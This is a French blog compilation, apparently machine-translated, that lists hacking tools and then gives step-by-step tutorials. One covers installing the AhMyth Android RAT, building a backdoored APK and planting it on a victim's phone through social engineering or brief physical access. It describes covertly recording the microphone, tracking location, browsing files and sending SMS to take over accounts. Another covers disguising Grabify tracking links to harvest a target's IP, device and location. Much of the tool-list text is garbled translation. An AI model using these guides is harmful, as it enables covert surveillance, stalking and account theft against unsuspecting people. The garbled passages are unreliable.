Nmap continue de fonctionner sur tous les cadres de travail réels sur PC et les ensembles parallèles d'autorité sont accessibles pour Linux, Windows et Mac OS X. Malgré la fantastique ligne de charge exécutable Nmap, la suite Nmap intègre une interface graphique propulsée et les résultats de la visionneuse, un échange d'informations adaptable , appareil de redirection et d'investigation, un utilitaire pour regarder les résultats de sortie, et un dispositif d'examen de l'ère des faisceaux et des réactions.

5.  THC Hydra

THC Hydra

THC Hydra est un autre appareil exemplaire de division de mots d'ordre. Hydra est un appareil de séparation des mots de passe de connexion au système, qui est très rapide. Un élément extraordinaire à propos d'Hydra est que vous pouvez ajouter des modules pour accroître l'utilité de cet instrument de piratage.

Lorsque vous devez couper le courant d'une administration d'association à distance, Hydra est régulièrement l'instrument d'une décision. Il peut effectuer des attaques de référence de mots rapides contre plus de 50 conventions, y compris telnet, FTP, HTTP, https, smb, quelques bases de données et bien plus encore. Comme THC Amap, cette décharge vient des gens bien au THC. Les autres plaquettes en ligne sont Medusa et Ncrack. Le scanner de sécurité Nmap contient en outre de nombreux modules de séparation des clés secrètes de puissance sauvage en ligne.

6. Burp Suite

Suite Burp

Burp Suite est une étape incorporée conçue pour attaquer (la plupart des applications pent) Web. L'étape contient de nombreux périphériques de piratage avec diverses interfaces GUI qui encouragent et accélèrent la procédure d'agression d'une application. Comme toujours, l'appareil est destiné à avoir une perspective similaire à celle d'un programmeur à capuchon noir.

Burp Suite est une étape coordonnée pour effectuer des tests de sécurité des applications Web. Ses différents instruments fonctionnent de manière cohérente pour renforcer l'ensemble de la procédure de test, du démarrage du mappage et de l'investigation de la surface d'assaut d'une application jusqu'à la découverte et l'utilisation abusive des failles de sécurité.

7. Caïn et Abel

Cain et Abel (régulièrement abrégé en Cain) sont un instrument de récupération de clé secrète pour Microsoft Windows. Il peut récupérer de nombreuses sortes de mots de passe en utilisant des techniques, par exemple, l'utilisation de parcelles système pour renifler, briser différentes routines de hachage de clé secrète, par exemple, les attaques de lexique, l'alimentation animale et les attaques de cryptanalyse.

Les attaques de cryptanalyse sont effectuées au moyen de tables arc-en-ciel qui peuvent être créées avec le projet winrtgen.exe de Cain et Abel. Cain et Abel sont entretenus par Massimiliano Montoro et Sean Babcock. Enregistrer des discussions VoIP, traduire des mots de passe mixtes, récupérer des clés de système à distance, découvrir des boîtes de clés secrètes, révéler des mots de passe stockés et briser les conventions de pilotage.

Le système n'utilise pas à mauvais escient les vulnérabilités du produit ou les bogues qui ne peuvent pas être modifiés avec peu d'efforts. Il couvre certains points de vue / lacunes de sécurité présents dans les normes de la convention, les routines de vérification et les composants de réservation; sa conception principale est la récupération intacte des mots de passe et des qualifications de différentes sources, d'autre part, il envoie également des utilitaires «non standard» pour les clients Microsoft Windows.

8. OWASP Zed

Le proxy OWASP Zed Attack (ZAP) est un outil de test de pénétration intégré simple à utiliser pour détecter les vulnérabilités dans les applications Web. Le Zed Attack Proxy (ZAP) est actuellement un exemple parmi les entreprises OWASP les plus courantes. Ce piratage et un instrument de pentesting sont un programme exceptionnellement compétent et «simple à utiliser» qui découvre les vulnérabilités des applications Web.

Il est destiné à être utilisé par des personnes ayant une grande variété d'expérience en matière de sécurité et comme étant indiqué, il est parfait pour les concepteurs et les analyseurs utiles qui sont nouveaux dans les tests d'entrée. ZAP est un appareil grand public au motif qu'il a une tonne de renforcement et le groupe OWASP est vraiment un atout étonnant pour ceux qui travaillent dans la cybersécurité. ZAP propose des scanners robotisés et un ensemble d'instruments qui vous permettent de découvrir physiquement les failles de sécurité.

9. Maltego

Maltego est une étape informatisée des sciences juridiques qui a été conçue pour transmettre une image numérique du danger à la terre dans laquelle travaille une association. Le point de vue unique que Maltego offre à la fois aux substances système et aux actifs est l'accumulation de données publiées partout sur le Web, que ce soit la disposition actuelle d'un commutateur équilibré à la périphérie de votre système ou le lieu actuel de votre vice-président. lors de ses visites mondiales, Maltego peut trouver, totaliser et visualiser ces données.

Maltego est une étape unique créée pour transmettre une image de danger indubitable à l'environnement qu'une association possède et travaille. La marge de manœuvre intéressante de Maltego est de montrer la qualité et le sérieux à multiples facettes des objectifs uniques de déception et, en outre, les relations de confiance qui existent actuellement à l'intérieur de l'étendue de votre base.

10. Metasploit

Le Metasploit est l'outil beaucoup plus populaire. La cybersécurité permet à un testeur de pénétration et à des pirates d'utiliser cet outil, sa fonction est de rechercher la sécurité du réseau en faisant une vulnérabilité avec le système également. De plus, Metasploit impose également une administration et des tests productifs des systèmes de détection d'intrusion.

La «division» la plus connue de ce «dispositif de piratage multi-raisons» est le projet-cadre open source Metasploit, généralement appelé «Metasploit».

Cet appareil aide le client à créer et exécuter (connu ou généralement) du code d'aventure sur une machine cible distante. De nombreux clients Metasploit utilisent l'appareil à des fins hostiles à la criminologie et à l'évitement, dont un grand nombre sont intégrés au cadre Metasploit.

11. Wireshark

Wireshark est peut-être l '«outil de programmation» le plus connu. Wireshark existe depuis un certain temps maintenant et il est utilisé par un grand nombre d'experts en sécurité pour dépanner et briser les systèmes. Wireshark est une fabuleuse instruction d'amélioration de convention de programmation et de correspondance. Initialement nommée Ethereal, en mai 2006, la tâche a été renommée Wireshark en raison de problèmes de marque. C'est un analyseur de colis gratuit et open-source.

12. Scanner IP en colère

Angry IP Scanner, d'autre part, connu sous le nom d'ipscan est un scanner système open source et multi-étapes destiné à être rapide et facile à utiliser. Il examine les adresses IP et les ports et comporte de nombreux éléments différents.

Il est généralement utilisé par les dirigeants du système et les clients simplement curieux du monde entier, y compris les grandes et les petites entreprises, les banques et les organisations gouvernementales. Il continue de fonctionner sous Linux, Windows et Mac OS X, prenant potentiellement en charge différentes étapes également.

13. Scanner de sécurité à distance Nessus

Aux jours étranges auparavant, cet outil logiciel est beaucoup plus populaire à la demande du monde du piratage, actuellement cette source d'application n'est pas disponible pour les officiels mais les utilisateurs peuvent toujours l'utiliser gratuitement, il fonctionne généralement avec un système client-serveur, il aide les utilisateurs pour découvrir la vulnérabilité, il a été utilisé par plus de 75 000 entreprises.

Nessus Security Scanner est le plus connu des entreprises, Nessus a aidé de nombreuses grandes entreprises à analyser leur processus d'audit proportionnel aux entreprises, ce qui représente une économie de coûts efficace.

14. Ettercap

Ettercap est un dispositif de sécurité système gratuit et open source pour les agressions de l'homme du centre sur le LAN. Il peut être utilisé pour l'examen des conventions du système PC et l'évaluation de la sécurité.

Il continue de fonctionner sur différents cadres de travail de type Unix, notamment Linux, Mac OS X, BSD et Solaris et sur Microsoft Windows. Il est équipé d'un blocage du mouvement sur une section système, de la capture de mots de passe et d'une écoute dynamique furtive contre diverses conventions normales.

Ettercap répond aux attentes en plaçant l'interface système en mode gratuit et en endommageant ARP les machines cibles. Le long de ces lignes, il peut se comporter comme un «homme au centre» et déclencher différentes attaques contre les victimes. Ettercap a un support de plugin afin que les éléments puissent être étendus en incluant de nouveaux plugins.

15. Wapiti

Wapiti est un outil d'analyse des vulnérabilités des applications Web qui vous permet de vérifier la sécurité de votre application Web en analysant l'application et le programme du Web. Il fonctionne de type «boîte noire» qui analysera les pages Web de l'application Web déployée mais pas étudier le code source des pages Web et à partir de la page Web peut le scanner pour injecter des données.

16. Nikto

Nikto Web Scanner est un scanner de serveur Web qui teste les serveurs Web pour les fichiers / CGI dangereux, les logiciels de serveur obsolètes et d'autres problèmes. Il effectue des vérifications génériques et spécifiques aux types de serveurs. Il capture et imprime également tous les cookies reçus. Le code Nikto lui-même est Open Source (GPL), cependant, les fichiers de données qu'il utilise pour piloter le programme ne sont pas

17. SuperScan

SuperScan est un puissant scanner de port TCP, pinger, resolver. Vous pouvez obtenir une détection d'hôte améliorée en utilisant plusieurs méthodes ICMP, le scan TCP SYN. De plus, vous obtiendrez une sélection d'outils utiles (ping, traceroute, Whois etc)

18. Yersini

Yersinia est un outil de sécurité / piratage réseau pour les systèmes d'exploitation de type Unix, conçu pour tirer parti d'une certaine faiblesse des différents protocoles réseau. Yersinia est considéré comme un outil de sécurité précieux et largement utilisé. Il prétend être un cadre solide pour analyser et tester les réseaux et systèmes déployés.

19. Gomme

La plupart des gens ont des données qu'ils préfèrent ne pas partager avec d'autres - mots de passe, informations personnelles, documents classifiés du travail, dossiers financiers, poèmes auto-écrits et la liste continue. Une gomme à effacer est un outil de sécurité pour Windows qui permet simplement aux utilisateurs de supprimer des données sensibles de leur disque dur en écrasant plusieurs fois les motifs sélectionnés.

20. Scanner de vulnérabilité Acunetix

Plus de 70% des sites Web et des applications Web contiennent des vulnérabilités pouvant entraîner un vol de données. Acunetix a utilisé pour explorer votre page Web et analyse automatiquement toutes vos applications Web et trouve une injection SQL périlleuse, des scripts intersites et d'autres vulnérabilités qui exposent votre entreprise en ligne.


Voyons les meilleures applications de piratage Android  qui sont destinées au piratage, aux pirates, aux chercheurs en sécurité;

# 1  Hackode

Hackode: La boîte à outils du pirate est une application permettant aux testeurs de pénétration, aux pirates éthiques, à l'administrateur informatique et aux professionnels de la cybersécurité d'effectuer différentes tâches comme la reconnaissance, la numérisation des exploits, etc.

# 2  Androrat

Outil d'administration à distance pour Android. Androrat est une application client / serveur développée en Java Android pour le côté client et en Java / Swing pour le serveur.

# 3  APKInspector

APKinspector est un puissant outil graphique pour les analystes afin d'analyser les applications Android. L'objectif de ce projet est d'aider les analystes et les rétro-ingénieurs à visualiser les packages Android compilés et leur code DEX correspondant.

# 4  DroidBox

DroidBox est développé pour offrir une analyse dynamique des applications Android.

# 5  Burp Suite

Burp Suite est une plate-forme intégrée pour effectuer des tests de sécurité des applications Web. Ses différents outils fonctionnent de manière transparente pour prendre en charge l'intégralité du processus de test, depuis le mappage initial et l'analyse de la surface d'attaque d'une application, jusqu'à la recherche et à l'exploitation des failles de sécurité.

# 6  zANTI

zANTI est une boîte à outils de diagnostic réseau complète qui permet des audits complexes et des tests de pénétration en appuyant simplement sur un bouton. Il fournit des rapports basés sur le cloud qui vous guident à travers des directives simples pour assurer la sécurité du réseau.

# 7  Droid Sheep

DroidSheep peut être facilement utilisé par quiconque possède un appareil Android et seul le fournisseur du service Web peut protéger les utilisateurs. Tout le monde peut donc tester par lui-même la sécurité de son compte et décider de continuer à utiliser le service Web.

# 8  dSploit

dSploit est une suite d'analyse et de pénétration de réseau Android qui vise à offrir aux experts / geeks de la sécurité informatique la boîte à outils professionnelle la plus complète et la plus avancée pour effectuer des évaluations de la sécurité du réseau sur un appareil mobile.

# 9  Arpspoof

Arpspoof est un outil d'audit de réseau écrit à l'origine par Dug Song dans le cadre de son package dsniff. Cette application redirige le trafic sur le réseau local en forgeant des réponses ARP et en les envoyant à une cible spécifique ou à tous les hôtes sur les chemins du réseau local.

# 10  Requin pour racine

Le renifleur de trafic fonctionne sur 3G et WiFi (fonctionne également sur le mode captif FroYo). Pour ouvrir le vidage, utilisez WireShark ou un logiciel similaire, pour un aperçu du vidage sur le téléphone, utilisez Shark Reader. Basé sur tcpdump.

# 11  Nmap pour Android

Nmap (Network Mapper) est l'un des meilleurs parmi les différents outils de scanner de réseau (Port Finder), Nmap principalement développé pour Unix OS mais maintenant il est également disponible sur Windows et Android. Nmap pour Android est une application Nmap pour votre téléphone! Une fois votre analyse terminée, vous pouvez envoyer les résultats par e-mail. Cette application n'est pas une application officielle mais elle a l'air bien.

# 12  SSHDroid

Android Secure Shell: Secure Shell ou SSH est le meilleur protocole qui offre une couche de sécurité supplémentaire lorsque vous vous connectez à votre machine distante. SSHDroid est une implémentation de serveur SSH pour Android. Cette application vous permettra de vous connecter à votre appareil depuis un PC et d'exécuter des commandes (comme «terminal» et «adb shell»).

Téléchargez l'application Spyboy


Prenez le contrôle complet de n'importe quel téléphone Android avec le AhMyth RAT

Publié: 21 mai 2020 dans Linux , Réseaux , Tech hacks

0

 

 

 

 

 

 

2 votes

Comment pirater un téléphone Android à distance en utilisant Ahmyth Tutor - Tutoriels ...

Il y a plus de  2 milliards d' appareils Android actifs chaque mois, chacun pouvant être piraté à l'aide d'un outil d'administration à distance, plus communément appelé RAT. AhMyth , l'un de ces outils puissants, peut aider les étrangers à surveiller l'emplacement d'un appareil, à voir les SMS, à prendre des instantanés de la caméra et même à enregistrer avec le microphone sans que l'utilisateur le sache.

Les outils d'administration à distance étaient d'abord des programmes destinés à fournir un support technique aux ordinateurs distants en permettant à un administrateur de se connecter et de contrôler directement l'appareil. Cependant, les pirates ont rapidement vu le potentiel de ces outils et ont commencé à les utiliser pour des actes plus néfastes. Aujourd'hui, les RAT avancés sont utilisés pour accéder et contrôler à distance une grande variété d'appareils, mais aujourd'hui nous nous concentrerons sur l'un des plus populaires au monde - Android.

AhMyth est un nouveau RAT Android open source, à venir, actuellement en phase de développement bêta, qui utilise une interface graphique simple. Bien que les RAT Android ne soient pas une nouveauté, ce qui le distingue de la foule est l'interface utilisateur graphique simple et facile à comprendre. De plus, AhMyth est multi-plateforme, disponible sur Linux, Windows et macOS.

Le RAT se compose de deux parties. La première est une application côté serveur basée sur  le cadre Electron , dans notre cas, juste notre ordinateur de bureau ou portable, mais cela pourrait être mis à l'échelle dans une certaine mesure si nécessaire. Cela agit comme un panneau de contrôle que nous utilisons pour créer et se connecter au RAT. La deuxième partie est côté client, qui est l'application Android infectée que nous utiliserons comme porte dérobée.

Téléchargez l'application Spyboy

Obtenez le sur Google Play

Étape 1. Téléchargez et installez AhMyth

Il existe deux façons de télécharger et d'installer AhMyth. La première consiste à utiliser directement le code source de GitHub. La seconde consiste à utiliser les binaires qu'ils fournissent.

Méthode 1. Du code source

Si vous avez choisi de commencer avec le code source, vous devrez alors vérifier que quelques prérequis sont installés.

  • Java  - il est utilisé pour générer la porte dérobée APK.
  • Electron  - il est utilisé pour démarrer l'application de bureau.
  • Electron-builder  et  Electron-packer  - ils sont utilisés pour construire les binaires pour macOS, Windows et Linux.

Une fois que vous avez ces conditions préalables, vous êtes prêt à continuer. Commencez par cloner le code de GitHub avec les commandes suivantes.

git clone  https://github.com/AhMyth/AhMyth-Android-RAT.git

Ensuite, déplacez-vous vers le répertoire AhMyth-Android-Rat avec ce qui suit.

cd AhMyth-Android-RAT / AhMyth-Server

Une fois que vous y êtes, démarrez AhMyth avec la commande ci-dessous.

npm start

Ce programme est toujours en développement bêta, et en tant que tel, il n'est pas aussi robuste qu'il pourrait l'être. Certains utilisateurs ont rencontré des erreurs lors de la tentative de démarrage. Si vous le faites, essayez à nouveau de l'exécuter en tant que root, comme indiqué ci-dessous.

sudo npm start –unsafe-perm

Vous saurez que cela fonctionne lorsque vous verrez le lancement de l'interface graphique.

Méthode 2. De binaires

Le code source est un moyen de le télécharger, mais si vous êtes paresseux comme moi, il existe un moyen un peu plus simple - utilisez les binaires! C'est particulièrement agréable lorsque vous travaillez sur un ordinateur Windows et que vous ne voulez pas jouer avec la ligne de commande. Cela ne devrait pas être un problème car la plupart des gens l'ont déjà, mais vérifiez que Java est mis à jour sur votre ordinateur.

Accédez à la  page de publication AhMyth  et téléchargez la version pour votre système. Actuellement, seuls les fichiers Linux et Windows sont téléchargés.

Une fois que vous avez téléchargé le bon fichier, ouvrez-le sur votre ordinateur et il devrait commencer l'installation. Il s'ouvrira automatiquement à la fin. Après cela, nous devrions être prêts à partir!

Étape 2. Créez un APK

Maintenant que le programme est opérationnel, il est temps de créer une application Android avec une porte dérobée. En haut de l'écran, sélectionnez «APK Builder». La première chose à changer est «IP source». Il doit s'agir de l'adresse IP de l'ordinateur à partir duquel vous allez envoyer et recevoir des commandes.

À des fins de test, je vais simplement utiliser mon réseau Wi-Fi local. Cependant, si vous souhaitez qu'il fonctionne en dehors du réseau local, vous devrez transférer votre ordinateur vers Internet et utiliser votre adresse IP publique.AhMyth peut créer un APK de deux manières différentes. Il peut créer un fichier APK autonome ou être utilisé pour infecter une autre application afin de rester caché sur le périphérique cible. Pour ce faire, sélectionnez la case à côté de "Bind With Another Apk", puis parcourez et sélectionnez l'APK que vous souhaitez utiliser. Aujourd'hui, je vais simplement créer l'APK autonome par défaut, mais si un utilisateur malveillant déployait cela dans la réalité, il le lierait très probablement avec un autre APK.Une fois que vous avez tous les paramètres sélectionnés, vous êtes prêt à créer l'APK , cliquez simplement sur "Build".

Vous pouvez accéder à «C: \ Users \ UserName \ AhMyth \ Output» pour trouver l'APK intégré.

Étape 3. Déployez le RAT

Maintenant que vous avez un APK fonctionnel, il est temps de le déployer en le téléchargeant sur l'appareil Android cible. Toutes les méthodes d'attaque standard s'appliquent - tout pour amener l'utilisateur à télécharger l'APK. L'ingénierie sociale a tendance à fonctionner le mieux. Par exemple, si vous connaissez la personne, recommandez-lui une application et infectez-la.

La méthode de loin la plus efficace est que si vous avez un accès physique au téléphone, il ne faut que quelques secondes pour le télécharger et le masquer. Si vous avez choisi cette méthode, un moyen simple de le faire consiste à enregistrer l'APK dans Google Drive et à envoyer un lien au téléphone. Sur la plupart des téléphones, le téléchargement ne devrait prendre qu'une ou deux secondes.

Si le téléphone Android ne veut pas l'installer, il n'a probablement jamais activé «Sources inconnues» dans ses paramètres. Ouvrez les paramètres, puis allez dans «Sécurité» et cochez «Sources inconnues». C'est ainsi que les applications provenant de l'extérieur du Google Play Store peuvent être installées.

Étape 4. Commencez à écouter

En haut à gauche de l'écran AhMyth, sélectionnez l'onglet «Victimes», puis remplacez le   numéro de port par celui que vous utilisez. Vous pouvez également le laisser vide par défaut. Ensuite, cliquez sur "Listen". Une fois que cela est fait et que le RAT fonctionne correctement sur la victime, il devrait apparaître ici avec quelques informations de base.

Étape 5. Ouvrez le laboratoire

Maintenant que vous disposez d'un RAT opérationnel sur le périphérique cible, vous pouvez commencer à effectuer l'administration à distance. Cliquez sur le bouton «Ouvrir le laboratoire» et une nouvelle fenêtre contextuelle apparaîtra. Si vous connaissez d'autres RAT Android comme  Cerberus , vous serez peut-être un peu déçu du peu de fonctionnalités, mais je vous rappelle que ce n'est encore qu'au stade bêta.

Les fonctionnalités qu'il possède actuellement sont assez puissantes. Jetons un coup d'œil à quelques-uns d'entre eux. Le "Gestionnaire de fichiers" est génial car il vous permet de tout voir sur l'appareil jusqu'au micrologiciel. Avec cela, vous pourriez potentiellement découvrir toutes sortes d'informations sensibles, que ce soit des mots de passe et des cookies de session ou des photos compromettantes.

Une autre caractéristique est la possibilité d'enregistrer de l'audio via «Mic». Étant donné que les gens emportent leur téléphone avec eux partout où ils vont, vous avez en fait un bug ou un appareil d'écoute sur eux à tout moment.

Dans le même esprit que la dernière, vous disposez également d'une fonction de suivi («Localisation») afin que vous puissiez non seulement savoir ce qu'ils ont dit, mais aussi où ils l'ont dit. Une remarque à ce sujet, cependant, est qu'il peut être trompé par une simple application de spoofer GPS. J'en ai utilisé un sur l'appareil victime pour prendre la capture d'écran ci-dessous.

Si vous aimez vraiment semer le chaos, alors vous allez adorer cette nouvelle fonctionnalité: la possibilité non seulement de lire mais aussi d'envoyer des messages "SMS". Un moyen simple d'utiliser cela serait de pirater le Facebook de quelqu'un en réinitialisant son mot de passe avec un SMS, puis en utilisant le code envoyé. Vous pouvez utiliser votre propre imagination pour tout ce que vous pouvez faire en envoyant des messages depuis le téléphone de la cible.

Maintenant, vous avez peut-être remarqué que j'ai sauté la fonction "Appareil photo". Je l'ai fait parce que je n'ai pas pu le faire fonctionner sur mon appareil, ce qui pourrait simplement être un problème avec l'ancien Android que j'utilisais pour les tests. En principe, il est censé vous permettre d'envoyer des commandes pour prendre des photos avec l'appareil photo avant ou arrière et vous les renvoyer.

Se protéger des RAT Android

Il n'y a pas grand-chose que vous puissiez faire pour vous protéger contre les RAT en général, mais une chose que vous pouvez faire n'est pas d'installer des applications Android qui ne sont pas du Google Play Store. Cela ne signifie pas que toutes les applications Google Play sont sûres, mais elles sont beaucoup plus sûres que certaines applications aléatoires trouvées en ligne, car Google les analyse pour détecter les logiciels malveillants au mieux de leurs capacités.

L'installation à partir de «sources inconnues» est désactivée par défaut dans Android, mais si vous l'autorisez, vous augmentez également considérablement votre risque car vous n'obtiendrez plus l'invite de sécurité. Si vous avez une raison légitime de télécharger un fichier APK depuis l'extérieur de Google Play, assurez-vous d'appuyer sur «Autoriser cette installation uniquement», sinon vous pourriez accidentellement activer de manière permanente «Sources inconnues».

Une autre façon de vous protéger est de ne pas emmener votre téléphone à des réunions importantes ou partout où vous ne voulez pas que les gens écoutent. Faites également attention à qui vous laissez votre téléphone, car cela ne prend que quelques secondes pour télécharger l'un de ces RAT. Un exemple de cela peut être trouvé dans  M. Robot , lorsque Tyrell Wellick a installé des logiciels malveillants sur le téléphone Android d'un employé en quelques secondes.

Un autre moyen probablement plus évident pour empêcher l'installation de logiciels malveillants sur votre appareil Android: maintenez-le à jour. Installez des logiciels mis à jour dès leur sortie, car Google et les OEM proposent des correctifs de sécurité dans presque toutes les mises à jour, pas seulement de nouvelles fonctionnalités.

Enfin, vous pouvez envisager d'installer un logiciel antivirus sur votre appareil Android. Cela ne vous aidera pas tout le temps, mais c'est mieux que rien. Vous pouvez trouver une bonne liste d'applications antivirus pour Android sur Gadget Hacks.

Merci d'avoir lu! Si vous avez des questions, vous pouvez les poser ici dans les commentaires ci-dessous ou sur Twitter  @iamshubhamkumar__ .


Comment suivre l'emplacement d'une personne en ligne - avec les liens de suivi Grabify

Publié: 22 mai 2020 dans Réseautage , Tech hacks

0

 

 

 

 

 

 

1 Vote

8616516886512888cef135faa1b066b1_640x480Pour suivre quelqu'un avec Grabify, vous devez d'abord choisir un lien qui serait naturel à envoyer. Ensuite, vous déguisez la nature du lien en le faisant apparaître comme un lien raccourci normal vers un fichier torrent ou image. Lorsque la cible clique ou appuie sur le lien, vous capturez ses informations lorsqu'elles passent par le lien vers le leurre.

Que pouvez-vous apprendre d'un lien de suivi?

Le type d'informations que vous pouvez apprendre d'un lien de suivi dépend du type de lien que vous utilisez. Il existe deux types de liens de suivi que Grabify peut créer, la valeur par défaut étant une redirection légère et presque indétectable vers une URL leurre. Cette option par défaut ressemble et agit comme un raccourcisseur d'URL, et la personne moyenne ne le remarquerait pas.

À partir de ce type de lien, vous pouvez vous attendre à obtenir l'adresse IP, le pays, le navigateur, le système d'exploitation, le nom d'hôte et le service Internet, le fournisseur. Pour quelqu'un qui est harcelé en ligne, cela peut suffire à lui seul pour déposer un rapport de police ou porter plainte.

Si vous souhaitez utiliser le lien de suivi avancé proposé par Grabify, la cible verra une brève page de redirection qui ressemble à ceci:

Parce que l'utilisateur moyen ne reconnaîtrait pas cela comme quelque chose de suspect, il est généralement sûr de l'utiliser lorsque vous avez besoin de plus d'informations. Parce que nous rendons une page cette fois, nous pouvons en apprendre beaucoup plus sur l'utilisateur.

Grâce au suivi avancé, nous pouvons voir le niveau de la batterie et si l'appareil est branché ou non. Nous pouvons voir la marque et le modèle de l'appareil, l'adresse IP du réseau interne, le fuseau horaire, la taille de l'écran et même de quelle manière le l'utilisateur tient son appareil. Ce niveau de détail peut devenir carrément flippant et vous donner le dessus pour prouver que quelqu'un n'est pas vraiment ce qu'il prétend être.

Téléchargez l'application Spyboy

Obtenez le sur Google Play

Ce dont vous aurez besoin

Grabify est un projet basé sur le Web par  jLynx  qui peut être  consulté sur un navigateur . Bien que vous n'ayez pas besoin de vous inscrire à un compte pour utiliser Grabify, c'est gratuit, et il y a quelques options supplémentaires disponibles après l'avoir fait. Si vous aimez Grabify, vous aimerez peut-être certains des autres projets de jLynx, alors assurez-vous de les consulter sur  son site Web .

Étape 1. Trouver un lien plausible à envoyer

Pour que cette attaque fonctionne, nous devons créer un scénario dans lequel il est logique que la cible clique ou touche un lien. Il existe deux types de liens que nous pouvons envoyer, l'un charge une fausse page de référence qui récupère plus d'informations, et l'autre est un simple lien d'intercommunication qui est moins visible mais enregistre également moins d'informations.

Le lien le moins évident est le choix par défaut, donc à moins que nous ne voulions saisir tout ce que nous pouvons au risque de faire basculer la cible, nous pouvons nous concentrer sur la recherche d'une raison pour inciter la cible à cliquer ou à taper sur quelque chose. Contrairement à un jeton canari, qui vous amène à une page sans issue suspecte, Grabify vous permet de choisir où vous voulez que la victime se retrouve après avoir cliqué ou appuyé sur le lien, ce qui facilite beaucoup la prévention de votre cible de savoir que vous êtes mise en place d'un piège.

Il existe de nombreuses façons d'obtenir le lien vers la cible, et la plus courante consiste à laisser le lien dans un chat ou un e-mail sur votre compte, ce qui donne l'impression que le lien est important ou personnel. Si quelqu'un accède à votre compte et clique ou appuie sur le lien, vous le saurez immédiatement.

 

Dans un autre scénario, vous pourriez inciter quelqu'un à cliquer ou à toucher un lien en créant un contexte plausible, où le partage d'un lien est logique. Habituellement, des tactiques comme "Est-ce votre profil?" avec un lien qui remonte à leur profil sont les moins suspects,  comme le montre  l'  épisode Catfish de MTV  .

Étape 2. Créez une URL de suivi

La première étape du suivi d'une cible avec un lien Grabify consiste à trouver un lien que vous pensez que votre cible s'attendrait à recevoir. Cela devrait être quelque chose de peu suspect lorsque la cible se retrouve à l'URL, et cela servira de couverture pour le lien de suivi que vous créez. Vous voulez faire comme si vous leur envoyiez une version abrégée URL innocente régulière du lien leurre que vous choisissez.

Dans mon exemple, je raccourcirai  slowhotcomputer.com .

Accédez à  grabify.link et mettez votre URL dans le dossier. Ensuite, cliquez sur «Créer une URL», puis acceptez les conditions, pour créer votre lien URL de suivi.

Grabify générera une page de suivi, avec un lien de suivi et une interface avec des informations sur chaque fois que quelqu'un a cliqué ou tapé sur le lien. Au premier démarrage, il doit être vide, bien que certains raccourcisseurs d'URL utilisent des bots pour prévisualiser le lien que vous raccourcissez, et ces données peuvent apparaître.

Maintenant que nous avons un lien de suivi fonctionnel, il est temps de commencer à le faire ressembler à quelque chose que notre cible clique ou touche.

Étape 3. Raccourcissez et masquez votre lien de suivi

Grabify n'est pas exactement un nom d'URL subtile, donc pour réussir à faire cliquer ou appuyer sur un lien, votre cible fournit un lien qui ne semble pas trop déplacé. Vous pouvez masquer le lien avec un certain nombre de raccourcisseurs d'URL, dont certains sont disponibles directement dans Grabify.

Ci-dessous, vous pouvez voir la liste des raccourcisseurs d'URL pris en charge par Grabify. Cliquez sur «Afficher les autres raccourcisseurs de liens» à côté d'  autres liens  sur la page du journal.

Si les options de raccourcissement incluses ne conviennent pas à votre situation, vous pouvez toujours créer un lien personnalisé qui ressemble à un fichier image, GIF, CSV, HTML, Torrent ou fichier ISO.

Cliquez sur «Cliquez ici» à côté de  Sélectionner le nom de domaine  ou «Changer de domaine / Créer un lien personnalisé» dans la   boîte Nouvelle URL , puis consultez le menu déroulant «Extension». Vous pouvez donner l'impression que vous partagez un fichier plutôt qu'un lien de référence, ce qui peut mieux fonctionner pour inciter la cible à cliquer ou à taper sur votre lien.

Dans ce menu de liens personnalisés, il existe également des options pour un domaine différent de celui fourni par Grabify, fournir un chemin personnalisé et donner un paramètre personnalisé.

Une fois que vous avez généré un lien raccourci ou un déguisement d'URL personnalisé, vous êtes prêt à le présenter à la cible. Une fois que la cible clique ou touche le lien, une entrée apparaîtra dans la section «Résultats» de votre page de journal.

Étape 4. Interpréter les informations de suivi

Maintenant, ouvrez votre lien cible et voyez ce que vous obtenez. Dans la configuration par défaut, vous n'utilisez pas une fausse page de référence, vous n'obtenez donc pas le plus d'informations possible.

Vous devriez voir une détection sur votre portail de gestion (vous devrez peut-être actualiser la page), et vous pouvez la sélectionner pour afficher plus de détails. Comme vous pouvez le voir dans mon exemple ci-dessous, j'ai l'essentiel, comme l'emplacement, l'adresse IP et des informations telles que le fournisseur de services Internet et le système d'exploitation.

Pour accélérer les choses, vous pouvez activer la fonction «Smart Logger» en cliquant sur l'interrupteur à bascule sur l'interface Web. La bascule active une fausse page de suivi qui pourra extraire beaucoup plus d'informations.

Une fois que «Smart Logger» est activé, ouvrez à nouveau le lien et regardez les informations enregistrées. Cette fois, vous devriez voir beaucoup plus d'informations.

Ces informations supplémentaires peuvent nous en dire beaucoup. D'une part, dans mon exemple, l'adresse IP interne nous indique que cette personne est probablement connectée à un VPN, car une adresse IP locale standard ressemblerait probablement à «192.168.0.2» ou quelque chose de similaire. Nous pouvons également voir plus d'informations sur l'appareil spécifique à l'origine de la demande, ainsi que la taille de l'écran et les extensions de navigateur installées.

Vous remarquerez également que vous pouvez savoir si la batterie est en charge et quel est le niveau de la batterie. Cela pourrait vous permettre de suivre une personne sur une courte période, le niveau de sa batterie augmentant s'il est en charge ou diminuant s'il ne se charge pas, ce qui pourrait identifier l'appareil de manière unique. Une autre valeur négligée est la langue et le fuseau horaire, qui sont souvent définis par le système.

Dans certains cas, nous pouvons voir la marque et le modèle de l'appareil qui fait la demande, ce qui nous permet de localiser le matériel utilisé par la cible. N'importe lequel de ces détails peut suffire à casser un poisson-chat, soit en révélant qu'il est dans le mauvais état ou le mauvais pays, en montrant un appareil différent de celui que la personne utilise dans ses photos (probablement fausses), ou en montrant un fuseau horaire qui n'a aucun sens pour l'endroit où ils prétendent être.

Vaincre le suivi Grabify

La technologie de suivi derrière Grabify et d'autres trackers en ligne est puissante, mais il n'est pas impossible de la vaincre. Une grande partie des informations obtenues par Grabify provient de la chaîne d'agent utilisateur, donc l'utilisation de modules complémentaires de navigateur pour modifier votre chaîne d'agent utilisateur peut vous faire ressembler à un type d'appareil différent. Avec un agent utilisateur différent, vous pouvez masquer une grande partie de vos informations à partir d'un lien de suivi Grabify. En utilisant un VPN et des extensions de navigateur, j'ai pu masquer le pays, l'adresse IP et d'autres informations sur mon appareil.

